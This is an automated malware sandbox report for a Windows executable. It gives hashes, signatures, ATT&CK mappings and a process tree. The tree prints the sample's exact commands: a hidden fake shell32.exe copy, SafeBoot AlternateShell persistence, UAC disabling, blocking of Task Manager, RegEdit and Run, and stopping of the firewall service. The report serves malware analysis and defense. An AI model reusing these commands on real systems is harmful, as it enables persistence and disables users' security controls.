Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
26-07-2024 23:46
Static task
static1
Behavioral task
behavioral1
Sample
763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe
Resource
win7-20240708-en
General
-
Target
763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe
-
Size
608KB
-
MD5
763ef81345f2e3046e07ce3c9fc772b6
-
SHA1
e7b4ee03f99b23be9d19bcdbc13a3ea8e3b7a852
-
SHA256
f200b09ded14613804a32d367733c8e38e7c6d207a62e1c911b5ddf1e5a68545
-
SHA512
2d068e5a57d4aa232b81116c00b7e9ed33e2c6cfe8b9e37bb88666b372471dc5232cbba4bb6fee383aabdc0a05c2c5bf174ccb2875653484f886f158ede9347e
-
SSDEEP
12288:zjgVEGHSRgah8p5gkd7mNvZn479Q5bQjNDhlWM:zimRg/mv2q5bm3P
Malware Config
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2156 attrib.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Mozilla Firefox\mozillas.cfg 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe File created C:\Program Files (x86)\Mozilla Firefox\defaults\pref\local-settings.js 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2132 sc.exe 3024 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 35 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Kills process with taskkill 1 IoCs
pid Process 2416 taskkill.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2416 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2936 wrote to memory of 2184 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 30 PID 2936 wrote to memory of 2184 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 30 PID 2936 wrote to memory of 2184 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 30 PID 2936 wrote to memory of 2184 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 30 PID 2936 wrote to memory of 2076 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 32 PID 2936 wrote to memory of 2076 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 32 PID 2936 wrote to memory of 2076 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 32 PID 2936 wrote to memory of 2076 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 32 PID 2936 wrote to memory of 3004 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 34 PID 2936 wrote to memory of 3004 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 34 PID 2936 wrote to memory of 3004 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 34 PID 2936 wrote to memory of 3004 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 34 PID 2936 wrote to memory of 2168 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 36 PID 2936 wrote to memory of 2168 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 36 PID 2936 wrote to memory of 2168 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 36 PID 2936 wrote to memory of 2168 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 36 PID 2076 wrote to memory of 2156 2076 cmd.exe 37 PID 2076 wrote to memory of 2156 2076 cmd.exe 37 PID 2076 wrote to memory of 2156 2076 cmd.exe 37 PID 2076 wrote to memory of 2156 2076 cmd.exe 37 PID 3004 wrote to memory of 3012 3004 cmd.exe 38 PID 3004 wrote to memory of 3012 3004 cmd.exe 38 PID 3004 wrote to memory of 3012 3004 cmd.exe 38 PID 3004 wrote to memory of 3012 3004 cmd.exe 38 PID 2936 wrote to memory of 2932 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 39 PID 2936 wrote to memory of 2932 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 39 PID 2936 wrote to memory of 2932 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 39 PID 2936 wrote to memory of 2932 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 39 PID 2936 wrote to memory of 2788 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 40 PID 2936 wrote to memory of 2788 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 40 PID 2936 wrote to memory of 2788 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 40 PID 2936 wrote to memory of 2788 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 40 PID 2936 wrote to memory of 2928 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 41 PID 2936 wrote to memory of 2928 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 41 PID 2936 wrote to memory of 2928 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 41 PID 2936 wrote to memory of 2928 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 41 PID 2936 wrote to memory of 700 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 42 PID 2936 wrote to memory of 700 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 42 PID 2936 wrote to memory of 700 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 42 PID 2936 wrote to memory of 700 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 42 PID 2936 wrote to memory of 2472 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 43 PID 2936 wrote to memory of 2472 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 43 PID 2936 wrote to memory of 2472 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 43 PID 2936 wrote to memory of 2472 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 43 PID 2936 wrote to memory of 2236 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 45 PID 2936 wrote to memory of 2236 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 45 PID 2936 wrote to memory of 2236 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 45 PID 2936 wrote to memory of 2236 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 45 PID 2936 wrote to memory of 2280 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 46 PID 2936 wrote to memory of 2280 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 46 PID 2936 wrote to memory of 2280 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 46 PID 2936 wrote to memory of 2280 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 46 PID 2936 wrote to memory of 2752 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 49 PID 2936 wrote to memory of 2752 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 49 PID 2936 wrote to memory of 2752 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 49 PID 2936 wrote to memory of 2752 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 49 PID 2936 wrote to memory of 2760 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 50 PID 2936 wrote to memory of 2760 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 50 PID 2936 wrote to memory of 2760 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 50 PID 2936 wrote to memory of 2760 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 50 PID 2936 wrote to memory of 2800 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 51 PID 2936 wrote to memory of 2800 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 51 PID 2936 wrote to memory of 2800 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 51 PID 2936 wrote to memory of 2800 2936 763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe 51 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2156 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\763ef81345f2e3046e07ce3c9fc772b6_JaffaCakes118.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\shell32.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2184
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +R +S +H "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\shell32.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\attrib.exeattrib +R +S +H "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\shell32.exe"3⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c %windir%\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\SafeBoot" /v "AlternateShell" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\shell32.exe" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\System\CurrentControlSet\Control\SafeBoot" /v "AlternateShell" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\shell32.exe" /f3⤵
- System Location Discovery: System Language Discovery
PID:3012
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:2168 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:2552 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
PID:1156
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2932 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k %windir%\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2788 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2624
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k %windir%\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2928 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
PID:3020
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k %windir%\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "2" /f2⤵
- System Location Discovery: System Language Discovery
PID:700 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d "2" /f3⤵
- System Location Discovery: System Language Discovery
PID:684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k %windir%\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2472 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "1" /f3⤵
- Modifies visibility of file extensions in Explorer
- System Location Discovery: System Language Discovery
PID:604
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k %windir%\System32\reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2236 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k %windir%\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2280 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoFolderOptions" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:2672
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k %windir%\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2752 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f3⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c net stop ERSvc2⤵
- System Location Discovery: System Language Discovery
PID:2760 -
C:\Windows\SysWOW64\net.exenet stop ERSvc3⤵
- System Location Discovery: System Language Discovery
PID:2640 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ERSvc4⤵
- System Location Discovery: System Language Discovery
PID:2488
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c sc config ERSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2800 -
C:\Windows\SysWOW64\sc.exesc config ERSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k %windir%\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2804 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f3⤵
- Disables RegEdit via registry modification
- System Location Discovery: System Language Discovery
PID:1636
-
-
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM cmd.exe2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c %windir%\System32\reg.exe add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://cmyip.com" /f2⤵
- System Location Discovery: System Language Discovery
PID:2020 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "http://cmyip.com" /f3⤵
- System Location Discovery: System Language Discovery
PID:2428
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
3Hidden Files and Directories
3Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
608KB
MD5763ef81345f2e3046e07ce3c9fc772b6
SHA1e7b4ee03f99b23be9d19bcdbc13a3ea8e3b7a852
SHA256f200b09ded14613804a32d367733c8e38e7c6d207a62e1c911b5ddf1e5a68545
SHA5122d068e5a57d4aa232b81116c00b7e9ed33e2c6cfe8b9e37bb88666b372471dc5232cbba4bb6fee383aabdc0a05c2c5bf174ccb2875653484f886f158ede9347e